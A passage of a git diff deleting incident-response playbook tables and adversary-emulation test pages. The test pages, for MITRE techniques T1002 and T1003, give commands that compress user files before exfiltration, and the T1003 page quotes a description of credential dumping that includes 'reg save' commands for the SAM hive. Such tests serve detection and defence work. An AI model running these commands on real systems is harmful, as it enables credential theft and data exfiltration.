-| [RA2106](../Response_Actions/RA_2106_analyse_uri.md) | [Analyse uri](../Response_Actions/RA_2106_analyse_uri.md) | Analyse an URI |
-| [RA2107](../Response_Actions/RA_2107_list_hosts_communicated_by_port.md) | [List hosts communicated by port](../Response_Actions/RA_2107_list_hosts_communicated_by_port.md) | List hosts communicating by a specific port at the moment or at a particular time in the past |
-| [RA2108](../Response_Actions/RA_2108_list_hosts_connected_to_vpn.md) | [List hosts connected to VPN](../Response_Actions/RA_2108_list_hosts_connected_to_vpn.md) | List hosts connected to a VPN at the moment or at a particular time in the past |
-| [RA2109](../Response_Actions/RA_2109_list_hosts_connected_to_intranet.md) | [List hosts connected to intranet](../Response_Actions/RA_2109_list_hosts_connected_to_intranet.md) | List hosts connected to the internal network at the moment or at a particular time in the past |
-| [RA2110](../Response_Actions/RA_2110_list_data_transferred.md) | [List data transferred](../Response_Actions/RA_2110_list_data_transferred.md) | List the data that is being transferred at the moment or at a particular time in the past |
-| [RA2111](../Response_Actions/RA_2111_collect_transferred_data.md) | [Collect transferred data](../Response_Actions/RA_2111_collect_transferred_data.md) | Collect the data that is being transferred at the moment or at a particular time in the past |
-| [RA2112](../Response_Actions/RA_2112_identify_transferred_data.md) | [Identify transferred data](../Response_Actions/RA_2112_identify_transferred_data.md) | Identify the data that is being transferred at the moment or at a particular time in the past (i.e. its content, value) |
-| [RA2113](../Response_Actions/RA_2113_list_hosts_communicated_with_external_domain.md) | [List hosts communicated with external domain](../Response_Actions/RA_2113_list_hosts_communicated_with_external_domain.md) | List hosts communicated with an external domain |
-| [RA2114](../Response_Actions/RA_2114_list_hosts_communicated_with_external_ip.md) | [List hosts communicated with external IP](../Response_Actions/RA_2114_list_hosts_communicated_with_external_ip.md) | List hosts communicated with an external IP address |
-| [RA2115](../Response_Actions/RA_2115_list_hosts_communicated_with_external_url.md) | [List hosts communicated with external URL](../Response_Actions/RA_2115_list_hosts_communicated_with_external_url.md) | List hosts communicated with an external URL |
-| [RA2116](../Response_Actions/RA_2116_find_data_transferred_by_content_pattern.md) | [Find data transferred by content pattern](../Response_Actions/RA_2116_find_data_transferred_by_content_pattern.md) | Find the data that is being transferred at the moment or at a particular time in the past by its content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA2201](../Response_Actions/RA_2201_list_users_opened_email_message.md) | [List users opened email message](../Response_Actions/RA_2201_list_users_opened_email_message.md) | List users that have opened am email message |
-| [RA2202](../Response_Actions/RA_2202_collect_email_message.md) | [Collect email message](../Response_Actions/RA_2202_collect_email_message.md) | Collect an email message |
-| [RA2203](../Response_Actions/RA_2203_list_email_message_receivers.md) | [List email message receivers](../Response_Actions/RA_2203_list_email_message_receivers.md) | List receivers of a particular email message |
-| [RA2204](../Response_Actions/RA_2204_make_sure_email_message_is_phishing.md) | [Make sure email message is phishing](../Response_Actions/RA_2204_make_sure_email_message_is_phishing.md) | Make sure that an email message is a phishing attack |
-| [RA2205](../Response_Actions/RA_2205_extract_observables_from_email_message.md) | [Extract observables from email message](../Response_Actions/RA_2205_extract_observables_from_email_message.md) | Extract observables from an email message |
-| [RA2301](../Response_Actions/RA_2301_list_files_created.md) | [List files created](../Response_Actions/RA_2301_list_files_created.md) | List files that have been created at a particular time in the past |
-| [RA2302](../Response_Actions/RA_2302_list_files_modified.md) | [List files modified](../Response_Actions/RA_2302_list_files_modified.md) | List files that have been modified at a particular time in the past |
-| [RA2303](../Response_Actions/RA_2303_list_files_deleted.md) | [List files deleted](../Response_Actions/RA_2303_list_files_deleted.md) | List files that have been deleted at a particular time in the past |
-| [RA2304](../Response_Actions/RA_2304_list_files_downloaded.md) | [List files downloaded](../Response_Actions/RA_2304_list_files_downloaded.md) | List files that have been downloaded at a particular time in the past |
-| [RA2305](../Response_Actions/RA_2305_list_files_with_tampered_timestamps.md) | [List files with tampered timestamps](../Response_Actions/RA_2305_list_files_with_tampered_timestamps.md) | List files with tampered timestamps |
-| [RA2306](../Response_Actions/RA_2306_find_file_by_path.md) | [Find file by path](../Response_Actions/RA_2306_find_file_by_path.md) | Find a file by its path (including its name) |
-| [RA2307](../Response_Actions/RA_2307_find_file_by_metadata.md) | [Find file by metadata](../Response_Actions/RA_2307_find_file_by_metadata.md) | Find a file by its metadata (i.e. signature, permissions, MAC times) |
-| [RA2308](../Response_Actions/RA_2308_find_file_by_hash.md) | [Find file by hash](../Response_Actions/RA_2308_find_file_by_hash.md) | Find a file by its hash |
-| [RA2309](../Response_Actions/RA_2309_find_file_by_format.md) | [Find file by format](../Response_Actions/RA_2309_find_file_by_format.md) | Find a file by its format |
-| [RA2310](../Response_Actions/RA_2310_find_file_by_content_pattern.md) | [Find file by content pattern](../Response_Actions/RA_2310_find_file_by_content_pattern.md) | Find a file by its content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA2311](../Response_Actions/RA_2311_collect_file.md) | [Collect file](../Response_Actions/RA_2311_collect_file.md) | Collect a specific file from a (remote) host or a system |
-| [RA2312](../Response_Actions/RA_2312_analyse_file_hash.md) | [Analyse file hash](../Response_Actions/RA_2312_analyse_file_hash.md) | Analise a hash of a file |
-| [RA2313](../Response_Actions/RA_2313_analyse_windows_pe.md) | [Analyse Windows PE](../Response_Actions/RA_2313_analyse_windows_pe.md) | Analise MS Windows Portable Executable |
-| [RA2314](../Response_Actions/RA_2314_analyse_macos_macho.md) | [Analyse macos macho](../Response_Actions/RA_2314_analyse_macos_macho.md) | Analise macOS Mach-O |
-| [RA2315](../Response_Actions/RA_2315_analyse_unix_elf.md) | [Analyse Unix ELF](../Response_Actions/RA_2315_analyse_unix_elf.md) | Analise Unix ELF |
-| [RA2316](../Response_Actions/RA_2316_analyse_ms_office_file.md) | [Analyse MS office file](../Response_Actions/RA_2316_analyse_ms_office_file.md) | Analise MS Office file |
-| [RA2317](../Response_Actions/RA_2317_analyse_pdf_file.md) | [Analyse PDF file](../Response_Actions/RA_2317_analyse_pdf_file.md) | Analise PDF file |
-| [RA2318](../Response_Actions/RA_2318_analyse_script.md) | [Analyse script](../Response_Actions/RA_2318_analyse_script.md) | Analyse a script file (i.e. Python, PowerShell, Bash scripts etc) |
-| [RA2401](../Response_Actions/RA_2401_list_processes_executed.md) | [List processes executed](../Response_Actions/RA_2401_list_processes_executed.md) | List processes being executed at the moment or at a particular time in the past |
-| [RA2402](../Response_Actions/RA_2402_find_process_by_executable_path.md) | [Find process by executable path](../Response_Actions/RA_2402_find_process_by_executable_path.md) | Find a process that is being executed at the moment or at a particular time in the past by its executable path (including its name) |
-| [RA2403](../Response_Actions/RA_2403_find_process_by_executable_metadata.md) | [Find process by executable metadata](../Response_Actions/RA_2403_find_process_by_executable_metadata.md) | Find a process that is being executed at the moment or at a particular time in the past by its executable metadata (i.e. signature, permissions, MAC times) |
-| [RA2404](../Response_Actions/RA_2404_find_process_by_executable_hash.md) | [Find process by executable hash](../Response_Actions/RA_2404_find_process_by_executable_hash.md) | Find a process that is being executed at the moment or at a particular time in the past by its executable hash |
-| [RA2405](../Response_Actions/RA_2405_find_process_by_executable_format.md) | [Find process by executable format](../Response_Actions/RA_2405_find_process_by_executable_format.md) | Find a process that is being executed at the moment or at a particular time in the past by its executable format |
-| [RA2406](../Response_Actions/RA_2406_find_process_by_executable_content_pattern.md) | [Find process by executable content pattern](../Response_Actions/RA_2406_find_process_by_executable_content_pattern.md) | Find a process that is being executed at the moment or at a particular time in the past by its executable content (i.e. specific string, keyword, binary pattern etc) |
-| [RA2501](../Response_Actions/RA_2501_list_registry_keys_modified.md) | [List registry keys modified](../Response_Actions/RA_2501_list_registry_keys_modified.md) | List registry keys modified at a particular time in the past |
-| [RA2502](../Response_Actions/RA_2502_list_registry_keys_deleted.md) | [List registry keys deleted](../Response_Actions/RA_2502_list_registry_keys_deleted.md) | List registry keys that have been deleted at a particular time in the past |
-| [RA2503](../Response_Actions/RA_2503_list_registry_keys_accessed.md) | [List registry keys accessed](../Response_Actions/RA_2503_list_registry_keys_accessed.md) | List registry keys that have been accessed at a particular time in the past |
-| [RA2504](../Response_Actions/RA_2504_list_registry_keys_created.md) | [List registry keys created](../Response_Actions/RA_2504_list_registry_keys_created.md) | List registry keys that have been created at a particular time in the past |
-| [RA2505](../Response_Actions/RA_2505_list_services_created.md) | [List services created](../Response_Actions/RA_2505_list_services_created.md) | List services that have been created at a particular time in the past |
-| [RA2506](../Response_Actions/RA_2506_list_services_modified.md) | [List services modified](../Response_Actions/RA_2506_list_services_modified.md) | List services that have been modified at a particular time in the past |
-| [RA2507](../Response_Actions/RA_2507_list_services_deleted.md) | [List services deleted](../Response_Actions/RA_2507_list_services_deleted.md) | List services that have been deleted at a particular time in the past |
-| [RA2601](../Response_Actions/RA_2601_list_users_authenticated.md) | [List users authenticated](../Response_Actions/RA_2601_list_users_authenticated.md) | List users authenticated at a particular time in the past on a particular system |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Stages/RS0003.md b/Atomic_Threat_Coverage/Response_Stages/RS0003.md
deleted file mode 100644
index 434f8f6..0000000
--- a/Atomic_Threat_Coverage/Response_Stages/RS0003.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Containment 
-
-**ID**: RS0003
-
-Prevent a threat from achieving its objectives and/or spreading around an environment.
-## Response Actions
-
-| ID    | Name     | Description |
-|:-----:|:--------:|-------------|
-| [RA3001](../Response_Actions/RA_3001_patch_vulnerability.md) | [Patch vulnerability](../Response_Actions/RA_3001_patch_vulnerability.md) | Patch a vulnerability in an asset |
-| [RA3101](../Response_Actions/RA_3101_block_external_ip_address.md) | [Block external IP address](../Response_Actions/RA_3101_block_external_ip_address.md) | Block an external IP address from being accessed by corporate assets |
-| [RA3102](../Response_Actions/RA_3102_block_internal_ip_address.md) | [Block internal IP address](../Response_Actions/RA_3102_block_internal_ip_address.md) | Block an internal IP address from being accessed by corporate assets |
-| [RA3103](../Response_Actions/RA_3103_block_external_domain.md) | [Block external domain](../Response_Actions/RA_3103_block_external_domain.md) | Block an external domain name from being accessed by corporate assets |
-| [RA3104](../Response_Actions/RA_3104_block_internal_domain.md) | [Block internal domain](../Response_Actions/RA_3104_block_internal_domain.md) | Block an internal domain name from being accessed by corporate assets |
-| [RA3105](../Response_Actions/RA_3105_block_external_url.md) | [Block external URL](../Response_Actions/RA_3105_block_external_url.md) | Block an external URL from being accessed by corporate assets |
-| [RA3106](../Response_Actions/RA_3106_block_internal_url.md) | [Block internal URL](../Response_Actions/RA_3106_block_internal_url.md) | Block an internal URL from being accessed by corporate assets |
-| [RA3107](../Response_Actions/RA_3107_block_port_external_communication.md) | [Block port external communication](../Response_Actions/RA_3107_block_port_external_communication.md) | Block a network port for external communications |
-| [RA3108](../Response_Actions/RA_3108_block_port_internal_communication.md) | [Block port internal communication](../Response_Actions/RA_3108_block_port_internal_communication.md) | Block a network port for internal communications |
-| [RA3109](../Response_Actions/RA_3109_block_user_external_communication.md) | [Block user external communication](../Response_Actions/RA_3109_block_user_external_communication.md) | Block a user for external communications |
-| [RA3110](../Response_Actions/RA_3110_block_user_internal_communication.md) | [Block user internal communication](../Response_Actions/RA_3110_block_user_internal_communication.md) | Block a user for internal communications |
-| [RA3111](../Response_Actions/RA_3111_block_data_transferring_by_content_pattern.md) | [Block data transferring by content pattern](../Response_Actions/RA_3111_block_data_transferring_by_content_pattern.md) | Block data transferring by its content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA3201](../Response_Actions/RA_3201_block_domain_on_email.md) | [Block domain on email](../Response_Actions/RA_3201_block_domain_on_email.md) | Block a domain name on an Email server |
-| [RA3202](../Response_Actions/RA_3202_block_sender_on_email.md) | [Block sender on email](../Response_Actions/RA_3202_block_sender_on_email.md) | Block an email sender on the Email-server |
-| [RA3203](../Response_Actions/RA_3203_quarantine_email_message.md) | [Quarantine email message](../Response_Actions/RA_3203_quarantine_email_message.md) | Quarantine an email message |
-| [RA3301](../Response_Actions/RA_3301_quarantine_file_by_format.md) | [Quarantine file by format](../Response_Actions/RA_3301_quarantine_file_by_format.md) | Quarantine a file by its format |
-| [RA3302](../Response_Actions/RA_3302_quarantine_file_by_hash.md) | [Quarantine file by hash](../Response_Actions/RA_3302_quarantine_file_by_hash.md) | Quarantine a file by its hash |
-| [RA3303](../Response_Actions/RA_3303_quarantine_file_by_path.md) | [Quarantine file by path](../Response_Actions/RA_3303_quarantine_file_by_path.md) | Quarantine a file by its path |
-| [RA3304](../Response_Actions/RA_3304_quarantine_file_by_content_pattern.md) | [Quarantine file by content pattern](../Response_Actions/RA_3304_quarantine_file_by_content_pattern.md) | Quarantine a file by its content pattern |
-| [RA3401](../Response_Actions/RA_3401_block_process_by_executable_path.md) | [Block process by executable path](../Response_Actions/RA_3401_block_process_by_executable_path.md) | Block a process execution by its executable path (including its name) |
-| [RA3402](../Response_Actions/RA_3402_block_process_by_executable_metadata.md) | [Block process by executable metadata](../Response_Actions/RA_3402_block_process_by_executable_metadata.md) | Block a process execution by its executable metadata (i.e. signature, permissions, MAC times) |
-| [RA3403](../Response_Actions/RA_3403_block_process_by_executable_hash.md) | [Block process by executable hash](../Response_Actions/RA_3403_block_process_by_executable_hash.md) | Block a process execution by its executable hash |
-| [RA3404](../Response_Actions/RA_3404_block_process_by_executable_format.md) | [Block process by executable format](../Response_Actions/RA_3404_block_process_by_executable_format.md) | Block a process execution by its executable format |
-| [RA3405](../Response_Actions/RA_3405_block_process_by_executable_content_pattern.md) | [Block process by executable content pattern](../Response_Actions/RA_3405_block_process_by_executable_content_pattern.md) | Block a process execution by its executable content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA3501](../Response_Actions/RA_3501_disable_system_service.md) | [Disable system service](../Response_Actions/RA_3501_disable_system_service.md) | Disable a system service |
-| [RA3601](../Response_Actions/RA_3601_lock_user_account.md) | [Lock user account](../Response_Actions/RA_3601_lock_user_account.md) | Lock an user account |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Stages/RS0004.md b/Atomic_Threat_Coverage/Response_Stages/RS0004.md
deleted file mode 100644
index bb35bb8..0000000
--- a/Atomic_Threat_Coverage/Response_Stages/RS0004.md
+++ /dev/null
@@ -1,17 +0,0 @@
-# Eradication 
-
-**ID**: RS0004
-
-Remove a threat from an environment.
-## Response Actions
-
-| ID    | Name     | Description |
-|:-----:|:--------:|-------------|
-| [RA4001](../Response_Actions/RA_4001_report_incident_to_external_companies.md) | [Report incident to external companies](../Response_Actions/RA_4001_report_incident_to_external_companies.md) | Report incident to external companies |
-| [RA4101](../Response_Actions/RA_4101_remove_rogue_network_device.md) | [Remove rogue network device](../Response_Actions/RA_4101_remove_rogue_network_device.md) | Remove a rogue network device |
-| [RA4201](../Response_Actions/RA_4201_delete_email_message.md) | [Delete email message](../Response_Actions/RA_4201_delete_email_message.md) | Delete an email message from an Email Server and users' email boxes |
-| [RA4301](../Response_Actions/RA_4301_remove_file.md) | [Remove file](../Response_Actions/RA_4301_remove_file.md) | Remove a specific file from a (remote) host or a system |
-| [RA4501](../Response_Actions/RA_4501_remove_registry_key.md) | [Remove registry key](../Response_Actions/RA_4501_remove_registry_key.md) | Remove a registry key |
-| [RA4502](../Response_Actions/RA_4502_remove_service.md) | [Remove service](../Response_Actions/RA_4502_remove_service.md) | Remove a service |
-| [RA4601](../Response_Actions/RA_4601_revoke_authentication_credentials.md) | [Revoke authentication credentials](../Response_Actions/RA_4601_revoke_authentication_credentials.md) | Revoke authentication credentials |
-| [RA4602](../Response_Actions/RA_4602_remove_user_account.md) | [Remove user account](../Response_Actions/RA_4602_remove_user_account.md) | Remove a user account |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Stages/RS0005.md b/Atomic_Threat_Coverage/Response_Stages/RS0005.md
deleted file mode 100644
index ce017f9..0000000
--- a/Atomic_Threat_Coverage/Response_Stages/RS0005.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Recovery 
-
-**ID**: RS0005
-
-Recover from the incident and return all the assets back to normal operation.
-## Response Actions
-
-| ID    | Name     | Description |
-|:-----:|:--------:|-------------|
-| [RA5001](../Response_Actions/RA_5001_reinstall_host_from_golden_image.md) | [Reinstall host from golden image](../Response_Actions/RA_5001_reinstall_host_from_golden_image.md) | Reinstall host OS from a golden image |
-| [RA5002](../Response_Actions/RA_5002_restore_data_from_backup.md) | [Restore data from backup](../Response_Actions/RA_5002_restore_data_from_backup.md) | Restore data from a backup |
-| [RA5101](../Response_Actions/RA_5101_unblock_blocked_ip.md) | [Unblock blocked IP](../Response_Actions/RA_5101_unblock_blocked_ip.md) | Unblock a blocked IP address |
-| [RA5102](../Response_Actions/RA_5102_unblock_blocked_domain.md) | [Unblock blocked domain](../Response_Actions/RA_5102_unblock_blocked_domain.md) | Unblock a blocked domain name |
-| [RA5103](../Response_Actions/RA_5103_unblock_blocked_url.md) | [Unblock blocked URL](../Response_Actions/RA_5103_unblock_blocked_url.md) | Unblock a blocked URL |
-| [RA5104](../Response_Actions/RA_5104_unblock_blocked_port.md) | [Unblock blocked port](../Response_Actions/RA_5104_unblock_blocked_port.md) | Unblock a blocked port |
-| [RA5105](../Response_Actions/RA_5105_unblock_blocked_user.md) | [Unblock blocked user](../Response_Actions/RA_5105_unblock_blocked_user.md) | Unblock a blocked user |
-| [RA5201](../Response_Actions/RA_5201_unblock_domain_on_email.md) | [Unblock domain on email](../Response_Actions/RA_5201_unblock_domain_on_email.md) | Unblock a domain on email |
-| [RA5202](../Response_Actions/RA_5202_unblock_sender_on_email.md) | [Unblock sender on email](../Response_Actions/RA_5202_unblock_sender_on_email.md) | Unblock a sender on email |
-| [RA5203](../Response_Actions/RA_5203_restore_quarantined_email_message.md) | [Restore quarantined email message](../Response_Actions/RA_5203_restore_quarantined_email_message.md) | Restore a quarantined email message |
-| [RA5301](../Response_Actions/RA_5301_restore_quarantined_file.md) | [Restore quarantined file](../Response_Actions/RA_5301_restore_quarantined_file.md) | Restore a quarantined file |
-| [RA5401](../Response_Actions/RA_5401_unblock_blocked_process.md) | [Unblock blocked process](../Response_Actions/RA_5401_unblock_blocked_process.md) | Unblock a blocked process |
-| [RA5501](../Response_Actions/RA_5501_enable_disabled_service.md) | [Enable disabled service](../Response_Actions/RA_5501_enable_disabled_service.md) | Enable a disabled service |
-| [RA5601](../Response_Actions/RA_5601_unlock_locked_user_account.md) | [Unlock locked user account](../Response_Actions/RA_5601_unlock_locked_user_account.md) | Unlock a locked user account |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Stages/RS0006.md b/Atomic_Threat_Coverage/Response_Stages/RS0006.md
deleted file mode 100644
index 12ca3e0..0000000
--- a/Atomic_Threat_Coverage/Response_Stages/RS0006.md
+++ /dev/null
@@ -1,11 +0,0 @@
-# Lessons Learned 
-
-**ID**: RS0006
-
-Discover how to improve the Incident Response process and implement the improvements.
-## Response Actions
-
-| ID    | Name     | Description |
-|:-----:|:--------:|-------------|
-| [RA6001](../Response_Actions/RA_6001_develop_incident_report.md) | [Develop incident report](../Response_Actions/RA_6001_develop_incident_report.md) | Develop the incident report |
-| [RA6002](../Response_Actions/RA_6002_conduct_lessons_learned_exercise.md) | [Conduct lessons learned exercise](../Response_Actions/RA_6002_conduct_lessons_learned_exercise.md) | Conduct Lessons Learned exercise |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Stages/responsestages.md b/Atomic_Threat_Coverage/Response_Stages/responsestages.md
deleted file mode 100644
index bee4b58..0000000
--- a/Atomic_Threat_Coverage/Response_Stages/responsestages.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Response Stages
-
-| ID    | Name     | Description |
-|:-----:|:--------:|-------------|
-| [RS0001](Response_Stages/RS0001.md) | [Preparation](Response_Stages/RS0001.md) | Get prepared for a security incident. |
-| [RS0002](Response_Stages/RS0002.md) | [Identification](Response_Stages/RS0002.md) | Gather information about a threat that has triggered a security incident, its TTPs, and affected assets. |
-| [RS0003](Response_Stages/RS0003.md) | [Containment](Response_Stages/RS0003.md) | Prevent a threat from achieving its objectives and/or spreading around an environment. |
-| [RS0004](Response_Stages/RS0004.md) | [Eradication](Response_Stages/RS0004.md) | Remove a threat from an environment. |
-| [RS0005](Response_Stages/RS0005.md) | [Recovery](Response_Stages/RS0005.md) | Recover from the incident and return all the assets back to normal operation. |
-| [RS0006](Response_Stages/RS0006.md) | [Lessons Learned](Response_Stages/RS0006.md) | Discover how to improve the Incident Response process and implement the improvements. |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Triggers/T1002.md b/Atomic_Threat_Coverage/Triggers/T1002.md
deleted file mode 100644
index 7e527c7..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1002.md
+++ /dev/null
@@ -1,231 +0,0 @@
-# T1002 - Data Compressed
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
-<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)
-
-- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
-
-- [Atomic Test #3 - Data Compressed - nix - zip](#atomic-test-3---data-compressed---nix---zip)
-
-- [Atomic Test #4 - Data Compressed - nix - gzip Single File](#atomic-test-4---data-compressed---nix---gzip-single-file)
-
-- [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file)
-
-
-<br/>
-
-## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
-An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.
-When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1002-data-ps.zip in the $env:USERPROFILE directory 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE|
-| output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE&#92;T1002-data-ps.zip|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -path #{output_file} -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Compress Data for Exfiltration With Rar
-An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.
-When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1002-data.rar in the %USERPROFILE% directory 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_path | Path that should be compressed into our output file | Path | %USERPROFILE%|
-| file_extension | Extension of files to compress | String | .txt|
-| output_file | Path where resulting compressed data should be placed | Path | %USERPROFILE%&#92;T1002-data.rar|
-| rar_installer | Winrar installer | Path | %TEMP%&#92;winrar.exe|
-| rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
-```
-
-#### Cleanup Commands:
-```cmd
-del /f /q /s #{output_file} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: Rar tool must be installed at specified location (#{rar_exe})
-##### Check Prereq Commands:
-```cmd
-if not exist "#{rar_exe}" (exit /b 1) 
-```
-##### Get Prereq Commands:
-```cmd
-echo Downloading Winrar installer
-bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
-echo Follow the installer prompts to install Winrar
-#{rar_installer}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Data Compressed - nix - zip
-An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt|
-| output_file | Path that should be output as a zip archive | Path | $HOME/data.zip|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-zip #{output_file} #{input_files}
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file}
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Files to zip must exist (#{input_files})
-##### Check Prereq Commands:
-```sh
-ls #{input_files} 
-```
-##### Get Prereq Commands:
-```sh
-echo Please set input_files argument to include files that exist
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Data Compressed - nix - gzip Single File
-An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt|
-| input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{input_file}.gz
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Data Compressed - nix - tar Folder or File
-An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME|
-| output_file | File that should be output | Path | $HOME/data.tar.gz|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-tar -cvzf #{output_file} #{input_file_folder}
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file}
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Folder to zip must exist (#{input_file_folder})
-##### Check Prereq Commands:
-```sh
-test -e #{input_file_folder} 
-```
-##### Get Prereq Commands:
-```sh
-echo Please set input_file_folder argument to a folder that exists
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1003.md b/Atomic_Threat_Coverage/Triggers/T1003.md
deleted file mode 100644
index 5d39515..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1003.md
+++ /dev/null
@@ -1,943 +0,0 @@
-# T1003 - Credential Dumping
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
-<blockquote>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
-
-Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
-
-### Windows
-
-#### SAM (Security Accounts Manager)
-
-The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.
- 
-A number of tools can be used to retrieve the SAM file through in-memory techniques:
-
-* pwdumpx.exe 
-* [gsecdump](https://attack.mitre.org/software/S0008)
-* [Mimikatz](https://attack.mitre.org/software/S0002)
-* secretsdump.py
-
-Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
-
-* <code>reg save HKLM\sam sam</code>
-* <code>reg save HKLM\system system</code>
-
-Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
-
-Notes:
-Rid 500 account is the local, in-built administrator.
-Rid 501 is the guest account.
-User accounts start with a RID of 1,000+.
-
-#### Cached Credentials
-
-The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
- 
-A number of tools can be used to retrieve the SAM file through in-memory techniques.
-
-* pwdumpx.exe 
-* [gsecdump](https://attack.mitre.org/software/S0008)
-* [Mimikatz](https://attack.mitre.org/software/S0002)
-
-Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
-
-Notes:
-Cached credentials for Windows Vista are derived using PBKDF2.
-
-#### Local Security Authority (LSA) Secrets
-
-With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
- 
-When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
- 
-A number of tools can be used to retrieve the SAM file through in-memory techniques.
-
-* pwdumpx.exe 
-* [gsecdump](https://attack.mitre.org/software/S0008)
-* [Mimikatz](https://attack.mitre.org/software/S0002)
-* secretsdump.py
-
-Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
-
-Notes:
-The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
-Windows 10 adds protections for LSA Secrets described in Mitigation.
-
-#### NTDS from Domain Controller
-
-Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
- 
-The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
-
-* Volume Shadow Copy
-* secretsdump.py
